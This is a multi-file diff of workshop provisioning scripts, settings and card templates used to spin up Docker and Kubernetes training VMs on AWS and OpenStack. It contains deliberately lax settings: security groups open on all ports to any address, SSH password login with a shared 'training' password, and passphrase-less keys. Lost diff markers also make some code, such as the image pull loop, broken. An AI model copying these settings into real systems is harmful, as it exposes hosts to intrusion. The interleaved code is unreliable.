# Remedy: wipe out Weave state and delete weave pod on that node.
# Specifically, identify the weave pod that is defective, then:
# kubectl -n kube-system exec weave-net-XXXXX -c weave rm /weavedb/weave-netdata.db
# kubectl -n kube-system delete pod weave-net-XXXXX
_cmd weavetest "Check that weave seems properly setup"
_cmd_weavetest() {
TAG=$1
need_tag
pssh "
kubectl -n kube-system get pods -o name | grep weave | cut -d/ -f2 |
xargs -I POD kubectl -n kube-system exec POD -c weave -- \
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
}
###
greet() {
IAMUSER=$(aws iam get-user --query 'User.UserName')
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
}
link_tag() {
TAG=$1
need_tag $TAG
IPS_FILE=tags/$TAG/ips.txt
need_ips_file $IPS_FILE
ln -sf $IPS_FILE ips.txt
}
pull_tag() {
TAG=$1
need_tag $TAG
link_tag $TAG
if [ ! -s $IPS_FILE ]; then
die "Nonexistent or empty IPs file $IPS_FILE."
fi
# Pre-pull a bunch of images
pssh --timeout 900 'for I in \
debian:latest \
ubuntu:latest \
fedora:latest \
centos:latest \
elasticsearch:2 \
postgres \
redis \
alpine \
registry \
nicolaka/netshoot \
jpetazzo/trainingwheels \
golang \
training/namer \
dockercoins/hasher \
dockercoins/rng \
dockercoins/webui \
dockercoins/worker \
logstash \
prom/node-exporter \
google/cadvisor \
dockersamples/visualizer \
nathanleclaire/redisonrails; do
debian:latest \
ubuntu:latest \
fedora:latest \
centos:latest \
elasticsearch:2 \
postgres \
redis \
alpine \
registry \
nicolaka/netshoot \
jpetazzo/trainingwheels \
golang \
training/namer \
dockercoins/hasher \
dockercoins/rng \
dockercoins/webui \
dockercoins/worker \
logstash \
prom/node-exporter \
google/cadvisor \
dockersamples/visualizer \
nathanleclaire/redisonrails; do
sudo -u docker docker pull $I
done'
info "Finished pulling images for $TAG."
info "You may now want to run:"
info "$0 cards $TAG <settings/somefile.yaml>"
}
wait_until_tag_is_running() {
max_retry=50
TAG=$1
COUNT=$2
i=0
done_count=0
while [[ $done_count -lt $COUNT ]]; do
let "i += 1"
info "$(printf "%d/%d instances online" $done_count $COUNT)"
done_count=$(aws ec2 describe-instances \
--filters "Name=instance-state-name,Values=running" \
"Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].State.Name" \
| tr "\t" "\n" \
| wc -l)
if [[ $i -gt $max_retry ]]; then
die "Timed out while waiting for instance creation (after $max_retry retries)"
fi
sleep 1
done
}
tag_is_reachable() {
TAG=$1
need_tag $TAG
link_tag $TAG
pssh -t 5 true 2>&1 >/dev/null
}
test_tag() {
TAG=$1
ips_file=tags/$TAG/ips.txt
info "Picking a random IP address in $ips_file to run tests."
ip=$(shuf -n1 $ips_file)
n=$((1 + $RANDOM % $(wc -l <$ips_file)))
ip=$(head -n $n $ips_file | tail -n 1)
test_vm $ip
info "Tests complete."
}
@@ -593,8 +484,8 @@ test_vm() {
for cmd in "hostname" \
"whoami" \
"hostname -i" \
"ls -l /usr/local/bin/i_am_first_node" \
"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
"cat /tmp/node" \
"cat /tmp/ipv4" \
"cat /etc/hosts" \
"hostnamectl status" \
"docker version | grep Version -B1" \
@@ -655,9 +546,17 @@ sync_keys() {
fi
}
make_tag() {
get_token() {
if [ -z $USER ]; then
export USER=anonymous
fi
date +%Y-%m-%d-%H-%M-$USER
}
describe_tag() {
# Display instance details and reachability/status information
TAG=$1
need_tag $TAG
aws_display_instances_by_tag $TAG
aws_display_instance_statuses_by_tag $TAG
}

View File

@@ -1,30 +0,0 @@
# Default stub functions for infrastructure libraries.
# When loading an infrastructure library, these functions will be overridden.
infra_list() {
warning "infra_list is unsupported on $INFRACLASS."
}
infra_quotas() {
warning "infra_quotas is unsupported on $INFRACLASS."
}
infra_start() {
warning "infra_start is unsupported on $INFRACLASS."
}
infra_stop() {
warning "infra_stop is unsupported on $INFRACLASS."
}
infra_quotas() {
warning "infra_quotas is unsupported on $INFRACLASS."
}
infra_opensg() {
warning "infra_opensg is unsupported on $INFRACLASS."
}
infra_disableaddrchecks() {
warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
}

View File

@@ -1,216 +0,0 @@
infra_list() {
aws_display_tags
}
infra_quotas() {
greet
max_instances=$(aws ec2 describe-account-attributes \
--attribute-names max-instances \
--query 'AccountAttributes[*][AttributeValues]')
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
info "Available regions:"
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
}
infra_start() {
COUNT=$1
# Print our AWS username, to ease the pain of credential-juggling
greet
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
key_name=$(sync_keys)
AMI=$(aws_get_ami) # Retrieve the AWS image ID
if [ -z "$AMI" ]; then
die "I could not find which AMI to use in this region. Try another region?"
fi
AWS_KEY_NAME=$(make_key_name)
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
sep "Starting instances"
info " Count: $COUNT"
info " Region: $AWS_DEFAULT_REGION"
info " Token/tag: $TAG"
info " AMI: $AMI"
info " Key name: $AWS_KEY_NAME"
info " Instance type: $AWS_INSTANCE_TYPE"
result=$(aws ec2 run-instances \
--key-name $AWS_KEY_NAME \
--count $COUNT \
--instance-type $AWS_INSTANCE_TYPE \
--client-token $TAG \
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
--image-id $AMI)
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
info "Reservation ID: $reservation_id"
sep
# if instance creation succeeded, we should have some IDs
IDS=$(aws_get_instance_ids_by_client_token $TAG)
if [ -z "$IDS" ]; then
die "Instance creation failed."
fi
# Tag these new instances with a tag that is the same as the token
aws_tag_instances $TAG $TAG
# Wait until EC2 API tells us that the instances are running
wait_until_tag_is_running $TAG $COUNT
aws_get_instance_ips_by_tag $TAG > tags/$TAG/ips.txt
}
infra_stop() {
aws_kill_instances_by_tag
}
infra_opensg() {
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol icmp \
--port -1 \
--cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol udp \
--port 0-65535 \
--cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol tcp \
--port 0-65535 \
--cidr 0.0.0.0/0
}
infra_disableaddrchecks() {
IDS=$(aws_get_instance_ids_by_tag $TAG)
for ID in $IDS; do
info "Disabling source/destination IP checks on: $ID"
aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
done
}
wait_until_tag_is_running() {
max_retry=100
i=0
done_count=0
while [[ $done_count -lt $COUNT ]]; do
let "i += 1"
info "$(printf "%d/%d instances online" $done_count $COUNT)"
done_count=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
"Name=instance-state-name,Values=running" \
--query "length(Reservations[].Instances[])")
if [[ $i -gt $max_retry ]]; then
die "Timed out while waiting for instance creation (after $max_retry retries)"
fi
sleep 1
done
}
aws_display_tags() {
# Print all "Name" tags in our region with their instance count
echo "[#] [Status] [Token] [Tag]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
aws ec2 describe-instances \
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
| tr -d "\r" \
| uniq -c \
| sort -k 3 \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}
aws_get_tokens() {
aws ec2 describe-instances --output text \
--query 'Reservations[*].Instances[*].[ClientToken]' \
| sort -u
}
aws_display_instance_statuses_by_tag() {
IDS=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
aws ec2 describe-instance-status \
--instance-ids $IDS \
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
--output table
}
aws_display_instances_by_tag() {
result=$(aws ec2 describe-instances --output table \
--filter "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].[ \
InstanceId, \
State.Name, \
Tags[0].Value, \
PublicIpAddress, \
InstanceType \
]"
)
if [[ -z $result ]]; then
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
else
echo "$result"
fi
}
aws_get_instance_ids_by_filter() {
FILTER=$1
aws ec2 describe-instances --filters $FILTER \
--query Reservations[*].Instances[*].InstanceId \
--output text | tr "\t" "\n" | tr -d "\r"
}
aws_get_instance_ids_by_client_token() {
TOKEN=$1
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}
aws_get_instance_ids_by_tag() {
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}
aws_get_instance_ips_by_tag() {
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
--output text \
--query "Reservations[*].Instances[*].PublicIpAddress" \
| tr "\t" "\n" \
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}
aws_kill_instances_by_tag() {
IDS=$(aws_get_instance_ids_by_tag $TAG)
if [ -z "$IDS" ]; then
die "Invalid tag."
fi
info "Deleting instances with tag $TAG."
aws ec2 terminate-instances --instance-ids $IDS \
| grep ^TERMINATINGINSTANCES
info "Deleted instances with tag $TAG."
}
aws_tag_instances() {
OLD_TAG_OR_TOKEN=$1
NEW_TAG=$2
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}
aws_get_ami() {
##VERSION##
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 18.04 -t hvm:ebs -N -q
}

View File

@@ -1,8 +0,0 @@
infra_start() {
COUNT=$1
info "You should now run your provisioning commands for $COUNT machines."
info "Note: no machines have been automatically created!"
info "Once done, put the list of IP addresses in tags/$TAG/ips.txt"
info "(one IP address per line, without any comments or extra lines)."
touch tags/$TAG/ips.txt
}

View File

@@ -1,20 +0,0 @@
infra_start() {
COUNT=$1
cp terraform/*.tf tags/$TAG
(
cd tags/$TAG
terraform init
echo prefix = \"$TAG\" >> terraform.tfvars
echo count = \"$COUNT\" >> terraform.tfvars
terraform apply -auto-approve
terraform output ip_addresses > ips.txt
)
}
infra_stop() {
(
cd tags/$TAG
terraform destroy -auto-approve
)
}

View File

@@ -1,4 +1,4 @@
#!/usr/bin/env python3
#!/usr/bin/env python
import os
import sys
import yaml
@@ -31,13 +31,7 @@ while ips:
clusters.append(cluster)
template_file_name = SETTINGS["cards_template"]
template_file_path = os.path.join(
os.path.dirname(__file__),
"..",
"templates",
template_file_name
)
template = jinja2.Template(open(template_file_path).read())
template = jinja2.Template(open(template_file_name).read())
with open("ips.html", "w") as f:
f.write(template.render(clusters=clusters, **SETTINGS))
print("Generated ips.html")

View File

@@ -12,7 +12,6 @@ config = yaml.load(open("/tmp/settings.yaml"))
COMPOSE_VERSION = config["compose_version"]
MACHINE_VERSION = config["machine_version"]
CLUSTER_SIZE = config["clustersize"]
CLUSTER_PREFIX = config["clusterprefix"]
ENGINE_VERSION = config["engine_version"]
DOCKER_USER_PASSWORD = config["docker_user_password"]
@@ -84,7 +83,7 @@ system("sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /e
system("sudo service ssh restart")
system("sudo apt-get -q update")
system("sudo apt-get -qy install git jq")
system("sudo apt-get -qy install git jq python-pip")
#######################
### DOCKER INSTALLS ###
@@ -99,6 +98,7 @@ system("sudo apt-get -q update")
system("sudo apt-get -qy install docker-ce")
### Install docker-compose
#system("sudo pip install -U docker-compose=={}".format(COMPOSE_VERSION))
system("sudo curl -sSL -o /usr/local/bin/docker-compose https://github.com/docker/compose/releases/download/{}/docker-compose-{}-{}".format(COMPOSE_VERSION, platform.system(), platform.machine()))
system("sudo chmod +x /usr/local/bin/docker-compose")
system("docker-compose version")
@@ -122,7 +122,7 @@ addresses = list(l.strip() for l in sys.stdin)
assert ipv4 in addresses
def makenames(addrs):
return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
return [ "node%s"%(i+1) for i in range(len(addrs)) ]
while addresses:
cluster = addresses[:CLUSTER_SIZE]
@@ -136,21 +136,15 @@ while addresses:
print(cluster)
mynode = cluster.index(ipv4) + 1
system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
system("echo node{} | sudo tee /etc/hostname".format(mynode))
system("sudo hostname node{}".format(mynode))
system("sudo -u docker mkdir -p /home/docker/.ssh")
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
# Create a convenience file to easily check if we're the first node
if ipv4 == cluster[0]:
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
# On the first node, if we don't have a private key, generate one (with empty passphrase)
# If I'm node1 and don't have a private key, generate one (with empty passphrase)
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
else:
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
# Record the IPV4 and name of the first node
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
FINISH = time.time()
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])

View File

@@ -1,17 +1,12 @@
# This file can be sourced in order to directly run commands on
# a group of VMs whose IPs are located in ips.txt of the directory in which
# a batch of VMs whose IPs are located in ips.txt of the directory in which
# the command is run.
pssh() {
if [ -z "$TAG" ]; then
>/dev/stderr echo "Variable \$TAG is not set."
return
fi
HOSTFILE="tags/$TAG/ips.txt"
HOSTFILE="ips.txt"
[ -f $HOSTFILE ] || {
>/dev/stderr echo "Hostfile $HOSTFILE not found."
>/dev/stderr echo "No hostfile found at $HOSTFILE"
return
}

View File

@@ -1,28 +0,0 @@
# Number of VMs per cluster
clustersize: 1
# The hostname of each node will be clusterprefix + a number
clusterprefix: dmuc
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,28 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: kubenet
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,28 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: kuberouter
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,28 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: test
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,8 +1,5 @@
# Number of VMs per cluster
clustersize: 5
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: clusters.csv

View File

@@ -3,9 +3,6 @@
# Number of VMs per cluster
clustersize: 5
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
@@ -23,7 +20,7 @@ paper_margin: 0.2in
engine_version: test
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
compose_version: 1.18.0
machine_version: 0.13.0
# Password used to connect with the "docker user"

View File

@@ -3,9 +3,6 @@
# Number of VMs per cluster
clustersize: 1
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
@@ -23,8 +20,8 @@ paper_margin: 0.2in
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.15.0
compose_version: 1.21.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
docker_user_password: training

View File

@@ -1,29 +0,0 @@
# Number of VMs per cluster
clustersize: 4
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -0,0 +1,106 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.4em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

@@ -3,11 +3,8 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
cards_template: settings/kube101.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
@@ -23,9 +20,8 @@ paper_margin: 0.2in
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
compose_version: 1.21.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
docker_user_password: training

View File

@@ -3,9 +3,6 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
@@ -23,8 +20,8 @@ paper_margin: 0.2in
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.15.0
compose_version: 1.21.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
docker_user_password: training

View File

@@ -1,66 +0,0 @@
#!/bin/sh
set -e
export AWS_INSTANCE_TYPE=t3a.small
INFRA=infra/aws-us-west-2
STUDENTS=2
PREFIX=$(date +%Y-%m-%d-%H-%M)
SETTINGS=admin-dmuc
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $STUDENTS
./workshopctl deploy $TAG
./workshopctl disabledocker $TAG
./workshopctl kubebins $TAG
./workshopctl cards $TAG
SETTINGS=admin-kubenet
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
./workshopctl disableaddrchecks $TAG
./workshopctl deploy $TAG
./workshopctl kubebins $TAG
./workshopctl cards $TAG
SETTINGS=admin-kuberouter
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
./workshopctl disableaddrchecks $TAG
./workshopctl deploy $TAG
./workshopctl kubebins $TAG
./workshopctl cards $TAG
#INFRA=infra/aws-us-west-1
export AWS_INSTANCE_TYPE=t3a.medium
SETTINGS=admin-test
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
./workshopctl deploy $TAG
./workshopctl kube $TAG 1.13.5
./workshopctl cards $TAG

View File

@@ -1,218 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://FIXME.container.training/" -%}
{%- set pagesize = 9 -%}
{%- set lang = "en" -%}
{%- set event = "training session" -%}
{%- set backside = False -%}
{%- set image = "kube" -%}
{%- set clusternumber = 100 -%}
{%- set image_src = {
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
"kube": "https://avatars1.githubusercontent.com/u/13629408",
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
}[image] -%}
{%- if lang == "en" and clustersize == 1 -%}
{%- set intro -%}
Here is the connection information to your very own
machine for this {{ event }}.
You can connect to this VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machine is:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clustersize != 1 -%}
{%- set intro -%}
Here is the connection information to your very own
cluster for this {{ event }}.
You can connect to each VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machines are:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize == 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
machine pour cette formation.
Vous pouvez vous connecter à cette machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresse IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clusterprefix != "node" -%}
{%- set intro -%}
Here is the connection information for the
<strong>{{ clusterprefix }}</strong> environment.
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize != 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
cluster pour cette formation.
Vous pouvez vous connecter à chaque machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresses IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 15px;
font-family: 'Slabo 27px';
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
{% if backside %}
height: 31%;
{% endif %}
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
/*
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
*/
/**/
width: 30%;
padding-left: 1.5%;
padding-right: 1.5%;
/**/
}
p {
margin: 0.4em 0 0.4em 0;
}
div.back {
border: 1px dotted white;
}
div.back p {
margin: 0.5em 1em 0 1em;
}
img {
height: 4em;
float: right;
margin-right: -0.2em;
}
/*
img.enix {
height: 4.0em;
margin-top: 0.4em;
}
img.kube {
height: 4.2em;
margin-top: 1.7em;
}
*/
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
<div>
<p>{{ intro }}</p>
<p>
<img src="{{ image_src }}" />
<table>
{% if clusternumber != None %}
<tr><td>cluster:</td></tr>
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
{% endif %}
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
{{ listhead }}
<table>
{% for node in cluster %}
<tr>
<td>{{ clusterprefix }}{{ loop.index }}:</td>
<td>{{ node }}</td>
</tr>
{% endfor %}
</table>
</p>
<p>
{{ slides_are_at }}
<center>{{ url }}</center>
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% if backside %}
{% for x in range(pagesize) %}
<div class="back">
<br/>
<p>You got this at the workshop
"Getting Started With Kubernetes and Container Orchestration"
during QCON London (March 2019).</p>
<p>If you liked that workshop,
I can train your team or organization
on Docker, container, and Kubernetes,
with curriculums of 1 to 5 days.
</p>
<p>Interested? Contact me at:</p>
<p>jerome.petazzoni@gmail.com</p>
<p>Thank you!</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endif %}
{% endfor %}
</body>
</html>

View File

@@ -1,5 +0,0 @@
resource "openstack_compute_keypair_v2" "ssh_deploy_key" {
name = "${var.prefix}"
public_key = "${file("~/.ssh/id_rsa.pub")}"
}

View File

@@ -1,32 +0,0 @@
resource "openstack_compute_instance_v2" "machine" {
count = "${var.count}"
name = "${format("%s-%04d", "${var.prefix}", count.index+1)}"
image_name = "Ubuntu 16.04.5 (Xenial Xerus)"
flavor_name = "${var.flavor}"
security_groups = ["${openstack_networking_secgroup_v2.full_access.name}"]
key_pair = "${openstack_compute_keypair_v2.ssh_deploy_key.name}"
network {
name = "${openstack_networking_network_v2.internal.name}"
fixed_ip_v4 = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
}
}
resource "openstack_compute_floatingip_v2" "machine" {
count = "${var.count}"
# This is something provided to us by Enix when our tenant was provisioned.
pool = "Public Floating"
}
resource "openstack_compute_floatingip_associate_v2" "machine" {
count = "${var.count}"
floating_ip = "${openstack_compute_floatingip_v2.machine.*.address[count.index]}"
instance_id = "${openstack_compute_instance_v2.machine.*.id[count.index]}"
fixed_ip = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
}
output "ip_addresses" {
